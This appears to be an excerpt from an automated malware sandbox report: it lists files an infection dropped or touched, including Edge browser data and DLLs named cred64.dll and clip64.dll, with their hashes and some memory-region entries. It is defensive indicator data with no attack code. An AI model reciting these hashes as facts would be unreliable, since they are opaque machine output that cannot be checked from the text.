SHA1 73bf03c8f7bc58b4e28bcbfdd1c2ba52dea5dfb7
SHA256 57c7f10cd97c8db447281ad0f47d4694035056e050b85b81f5a5124f461621a2
SHA512 b5d34c43330f8070b3f353c826a54aecd99b7129a214913a365b66009a1a6744093bf085d3f86681ed40c714d6ebdfff40d99d7bd7a3508a0a0caed6304ac27c

C:\Users\Admin\AppData\Local\Temp\tmp6122.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp6128.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmp6593.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp660C.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/5836-858-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 09e1c452761dfa13b142db0c38fd935a
SHA1 d6d48f574f5796dea8402e101b1c60824e09acf4
SHA256 b46c82a4fa934fa2254f3cf6c7ac622d581dc917690f80cea61b5e53b86ce495
SHA512 02a3a989f669cb3ea560f06653bfb20bc7e329f6376e5c8861630455f9c097ed37b7675a30665173168ca705935ca7f9c182e5ecd906d8a3edcd09c14ca56736

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 80a77ff5684483b0ac8b167721408c5a
SHA1 f0dfa24e78bbfda84a81ac2eeb7f87c5c921fc9f
SHA256 25d12e256640a55fa0d07c07be25ffea3d7675eb1924210de96d99466043163a
SHA512 620ed741c7eefffc41519303e4cb074d2d65df034c9bb971be35b0f45a0633326c83030160d5a1d42d83ae2a57b762a1dc2dc48789936a1172282791c1173bdc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe587cad.TMP

MD5 0de5705a4b4104e3a8d1a9afdeb4eec0
SHA1 45c72c2c11656553a02057252f9e29a31686a643
SHA256 e67e3616a5be95555cb3470a2f2f4467095384bdcc9544affa47f90bf415afa2
SHA512 4b80f842efc6728a76f2c93881a585a52b5d0fde9c5f0aaa3ae8c0dd2b170edab4e49a997fb03c3a85dcf67cddd6e73da4f87f566f2f8ab362022143283dedf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b3bda68a75225727af48522d2029911f
SHA1 6c4c9a929ee8f951a181e9770111c9692a99f5b8
SHA256 614e023de6951ca6872f749d8d2684ae293b4681620ce22c05d682b02ca1f8aa
SHA512 81fb74b05c4c88dc0e9db0c3a44663ab9bd182c50c99a71ea0824fac7d9346ab24ca6d478b9e515b3257bb9660f9042bd55a802a4c01bcce3ea4bd88b0e1e3b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 8bb1f5d14524ebbef90e8970ee33ea36
SHA1 c766ba87341d3a6767c53e408a2af029f292f43d
SHA256 89f08dab0733492c3fb950621cabd9d4ee0cde4bb3485d74e4a76ad273d8f729
SHA512 414e162ee62c3c23830f0b60ca11555f956687c327db20bca229ec9ec32b7eed21a51019ac38682c5586f76817222b897a1c37c7140a4b76fe7ffb69ca4d481c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f9ae91562407b3a7fd3c2dc6a9efde93
SHA1 5dc30b44acc843decdbfe07ecf512f87f1e55fea
SHA256 569d1f8e1853ef200f656649a212e6ea083346cc43577563a18f694cf960dd8a
SHA512 899112a0ca4b4e2e6edc39f185762752d7bfc717a014ecfd167282da9ac45263b948a7987b15cf6f6ff89e7c20f712e0a59fe593a1a36c37a3e5802871411ef6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 33c0c6f1556adc9aa8f4ef30b53b1d10
SHA1 5c34dd64ed4b0270f4a77121887b8d11c2037a77
SHA256 4f176d21cd2b56d086dd601c8149bd1f846c8dca8634cce288af4ba882fde0df
SHA512 2d680222cdfd4eb2ed2791d427aa212ae63dc9c9cc2273e7bda4c0e486a0c5d028013271183eb4fb6a6e355996c5c9489df97de3963dc43d4bd8eb0e950c9d7a

memory/5680-959-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7cb53692ec44d0bb380817fbb3b9b998
SHA1 648613522afba16e635c991d1a41fc900ce1098d
SHA256 af500ac418e9851f34c644fcbb4775756c09384a8bd68e3f2521fe35c7e6ee3e
SHA512 0e59d8453f38e941e2a386b7a656ac46db55aac0e5d56b8fe791274ef1997834b6896baa686dc162d1cf1a1c0cdc0d3a077072f888f91d67d578463bcb6bbf49

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcatbqpn.41e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5836-1259-0x0000000000400000-0x0000000000612000-memory.dmp

memory/6028-1287-0x00007FF753340000-0x00007FF7538E1000-memory.dmp

memory/5680-1315-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a7999d3ff80fb836fb78c79582fd36e0
SHA1 d3b423bb1b300b37fc2f4376051ae05d1fcca31d
SHA256 12e7395b6c2c2e5553cd7c88f309beb93ea3aef4e44e7b773e09050e2d2d6c5b
SHA512 2dc69ff553a30fc53ac3a053caaff1ff17fa7a356c096e6b48a85a95b2f09908f3a079e9855f4d54729955e1fbb87a17dc44754111a5768ff102f21f802c5cfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f16ac33de6bb301a18c14a0d5ea7b01
SHA1 b2dd9e1d40f524bb44ee4902c6627f475e4d3533
SHA256 7f85e04a10bd69d24a84d51ea47a624823fc5ef75fb0b951f1cdc637a9f74fd2
SHA512 5c6e12e2a48e5b9fad80d708a730d8d45e077d75c6cbd4dccd6e220dc16220628a33cb3dacf9ee2c4d0b32195979345a3cbeeca7ec4fae657c8c08d6a04640dd

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/5836-1446-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 677ca84114ced46c59815f9b713182d0
SHA1 bbaf3b7b1ba0af6c07a65303272c62fa8a4b1378
SHA256 fd6f6352783603e0efc0ab07f237e04c2002f457493e148c80d58d7e3bed7c79
SHA512 ff87f1dd1e78a8c48fe51c401f910a5e86449af34562df48ecdd26a0aea7a1d2011d55f6be958f94962046efb0fec4d909c935ad9a97d9168c326fc76a988307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\6b8e435e-9136-4fd7-bef6-9c03aa5978e1\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 31bba393a9180a1b33901011e3d4b219
SHA1 847ed4b9143f49683d003ff3379b403215da17bc
SHA256 337c8d7adeb1dee1f626a2bcd3bf78a206b194ec60b67942a020974e1a62a631
SHA512 930122b07d61234964de6a300d1f17acd403c1139b88d72e29af23bbe50eebcb1eb848b10a587e8b67de84732aa6db7b819073dd920d4ae644b33b28b0e3c37c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe58c658.TMP

MD5 5b043701a6a38f60970e6b7bda773ec4
SHA1 4e4f803940ab851239b00b59492aedc88b8d193f
SHA256 bc34052267114d85bac37d0ae29e4156d62c3f76fc8248712f7de8972e10a137
SHA512 b0ac23c698945d20fe6bde02eae3d45062328d3f4ec7953610746e7d43b15b86d153c39934ec03feed36a7fce7fadba4e2d77d821264d37807a53bc5b212c545

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 88a0bec955d9f6c52a8132e1accfeff5
SHA1 0318624a6bbf78129c56a9d02ffa44efec288798
SHA256 d59a48c2ebe9ac134e577d4b55e019f85a2eb07ccd52959fdc75da7fb5f4b381
SHA512 7f18f8e4921838fb589eacf94eda3380d976f662e2e8dfe4528fcda5741d20675cb074f3cd57383fb504caa9e3862f2de72d917a72ff88f34504e3c04baee95e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\613a8679-2b47-4632-9ec5-e4d2894aecfe\index-dir\the-real-index

MD5 28e5463617e1a09e22f18d51b6937b48
SHA1 5cc480978172dcc45e1a5607f07945a053532870
SHA256 07402bb510909b8b4184e95b4c7086431e586d8a1c6a6f996fb5c0a96bace459
SHA512 4155b575c3b7855c97599c7eb6980c8c40fc2155d8cfd05edf3e5cf72b5150df2e6ed3f63e541e1094b0984efc0bb4f5c4165797f8b520a9dbe3946b8fca37e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\613a8679-2b47-4632-9ec5-e4d2894aecfe\index-dir\the-real-index~RFe58d53d.TMP

MD5 3af5c4c174a0ffa33dd881a404db7de3
SHA1 6a793c8e664cade14b059d8f201126b092a35ee6
SHA256 40e76f4fdf23b3fd00396653f640425d3bea4c087c20a4f18e837481e9c0f732
SHA512 bf38d8b2aa1789783a1f1b260945b9953270de7e0056cf8f3bdd8738f335ae13c499eb3631aeb4e2fa40e4b66bcfd86c152bfa2886463753ec4791e26aa07505

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c9bc689f-beb4-48d9-a239-1ce421099204\index-dir\the-real-index~RFe58dd8a.TMP

MD5 6befa0fc2d58bb71e635e4ad8760d10f
SHA1 86cd0faf9bf587df3de83495c0868618b2827d2b
SHA256 9d56cbaad1ca76f4882b4022818e7e519982aa95703a26ed4a0b51562be8dcd1
SHA512 c974e5725d5f5ed7459f0a8e6f679298af1f90aeb3c2626eb2d55da247de232526f051bf7409cbba4f8ae13e12f9fc92f36042a2bd867be20427a3ede0180626

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c9bc689f-beb4-48d9-a239-1ce421099204\index-dir\the-real-index

MD5 0b05a2aadb746b34929d72cfe6dba46c
SHA1 84f7b14d49b6c12c8d6cb51e3d3e97591006b062
SHA256 0ef059cdb86d9a85097020766a8d206bc8fdb47426fb9297cbd5101bf6b0d6ea
SHA512 560f8fc91930201ff456a09a94f611d0309be8f87314bd9083ff63a027956234c94f47c4a5c00e394b2644997a72571c40036d0f4750aaae2faece82c3f7ffa6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b9485c20bc9c153fdf4ea39c9bba1053
SHA1 221e6f61bcfdc956e75a8fc910ff056005df040c
SHA256 3c62a6718f9f20b1f5f9223a69f97d56d8cb389b07fd6683fe0257ddd5926322
SHA512 e5fcd6d14abb91329c618631cb205be12c7fe7e6208750a78915c61d895be6c04dc4bf765391fed23fe0ea40762f03895a4fbb817181ef4afd70ae5d7870241e

memory/5836-1639-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 74807d839b68fc9310152765d2b56448
SHA1 64da434c5bb50786be0ceb81d1d43c0e6c5b4cae
SHA256 62c261ff551d6d77adf8b4e262b9a06a7847362410267b1318e1d5e137733a10
SHA512 be33d975e1f86da6e933f947e34cad3076771315187eee115fffce6df984d784ea67a2c125e0d65df87c0b9162fa3f6552fb91aede6360c77053d48501b89c73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

memory/5836-1828-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c6594abb34e8c0b2d5c5a5bf4526c97c
SHA1 e5871acf8d2720cdf75aa4eeb35b938edabbe122
SHA256 84c704c27f4d224739010e88f1a8397c6712a16a3de5de9eb59672f17a5d045c
SHA512 3fd3a450e7b97172b6ebb26b9d6056c1e2ce2f3f9cd5c0fa0d057ff232d69674686e1994ac1984fce2129c72220b0db5c1c911867cc01d66979172789efdd916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 4a5dd94361455e2a537b47bfd3098651
SHA1 cc61f51a44fc738242ac63d4d92b556274df8253
SHA256 67fc42e567e826b20c404b58db49abcb9abe9cb5b076658ff3bdd874edbb151d
SHA512 ad442890706b4a509c292ff3da41443842fcfbbad4cd0b2323524c5dabe827360132088eaee5bab453011d2d41c88de6dddf233b08aeca413308d1490c889732

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5914b7.TMP

MD5 d512e62ee6ddb9528c4f22d95726f845
SHA1 0eb17890557bcfd276d6c7ce0abc199357da2c80
SHA256 e21ad05839564ce109fbd4459b96ff3eb1d9bcb0e42141d9327f5522b9238aab
SHA512 d4b2bbf157ce856b66e9077dd331eb0774db4802b1e32c865b379e08419b1fd7e6207d5001d5ea2031f4c8033c86fcee1320521466e5993bcaaf20d786ec5ce8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 99cdcb75afe17cda9d3e01be28f19613
SHA1 1d83a086337d1703bac9ec68e82e93c166953bc5
SHA256 8688c5a898648ec4a2b247d6c50733086760dc8a7706ae41cd7cd195b229068d
SHA512 d1722f06782cc3660acddad1672b746be3e54bf20202bbd8e9da31388049cb7cfb9bd1c2bae9a8fe67bc953c3bc8dd2ec549be99c5891ca90928805a101a1e1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\b3d2a354-c1d4-4bd2-a648-f5f5a9c7f997\index-dir\the-real-index

MD5 be76ac84fce9529aaecb81f74ead9f71
SHA1 cc1081d5fafe5df3ed45a37b671b33fa7ee2d60e
SHA256 a300eb487ad09f26c734f08fc13686b09ae04bdaa8ee2f5b0838c148c004e1d0
SHA512 7b49314a7be08fd258e2e642d6182b621b4a4213de323e236c4b2981718f47b4c9d03fd09f751d79efb2eda1fbb28d05e73c41a2b0a18c7ea71ff78e48c4444e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\b3d2a354-c1d4-4bd2-a648-f5f5a9c7f997\index-dir\the-real-index~RFe59265a.TMP

MD5 9e7b2edca0f02d9c571c4e03e1cd07fc
SHA1 629817db300a061eac8f210047d7c1363db81b2b
SHA256 0fa028998171b1a2d8e0b51ced23e7ffc7806e5f14c48aac001ffbe1c003bf4b
SHA512 c173c32c1cdefb115d05f1763da8e20a637b5d945456e8b99b8adeeae8a5b0bc7de39194d4e6038e85bb0cfe48f73869f01e3caf8d5b80861bf83721084cd830

memory/4360-1981-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5556-1984-0x00000000007E0000-0x0000000000800000-memory.dmp

memory/3496-1985-0x00007FF78C370000-0x00007FF78C911000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 889569013cf96ba294cf5c7e7e9e2ff3
SHA1 6b3db1dd7695ff330d1bae355c86c17c1d16e4c1
SHA256 73f079ba3ae39d9af55d2b740cc6d6056b98f4f41d1c3ddfdf87a83473f70ce1
SHA512 7c3ab5200e1d33363ccfb89edd70a465cb4c4b5dd33557fbefcd68d9f4ea95b39c92b693062f7907b5d77de58add30e47a88fbc7cb36131209c26852ad560d45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5dacf5479872831940b1a21b53c6843b
SHA1 b9888dc03ba1534082f8c0100e165700563cd362
SHA256 0c3c3ead6e9ad2483643a1085641c5a399e9ffc71462137853ff934b5fad55d3
SHA512 e67c92aea9198f1134580d59a0cdc611e6e1bf55f74b453406691bad9789085ea97c10d55bfd697c24ab9b8394685a312f35a541ca7c7a48b87ac8ef3fc31da4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002f

MD5 d5b05fff282c4e46d9dce60b03ad2705
SHA1 e901bd952fb76597e491fab0b16cc591bb42706d
SHA256 41012e644398ffcea450b7a5592d3a58ff8532fe71c192ad43c77c6337cb2549
SHA512 e1aae31f05090697242c29478a3cbbaee5f13e9ba3f2e31aa3473a438d5ff166e1936ac9defdd7c3d0e8206f24f27fab450f959b3887779e672458ad052a4b47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7ba35a1f7269d9581718236dd565a2eb
SHA1 14d8d159631522bffe7a939a7c59860305d37d20
SHA256 ca85def6bfb8f5168a2352172cbbe22d0a734e5ae39ed1fe05c29e19bb3afb46
SHA512 22c422c2b673ec515bc07697ed13f7d26f04d5fc199ba89ccd0d017392d064bbe8c4fe7186be03ed5e67e4e8c9d3e629dba71aa61d179e0c1004d68a2b58b279

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fab62a9d8a99646c2a4283fd5f23fcc7
SHA1 102eb0cc1ec98768d330978b4606528c94ab6cc4
SHA256 21f8f8e11d675a8e03e6d74d3f55a7573d0e5d8f3c4137f27d78171a95f6d8fa
SHA512 15ff755d9c6070ab6b97c48848a6ab22ea90c3d0f1cd8819c80b9402e9ed0a2ccdb431d26f3770512c74f9bd11c826dd0d00b76856c1b2093a59b730dcf4992c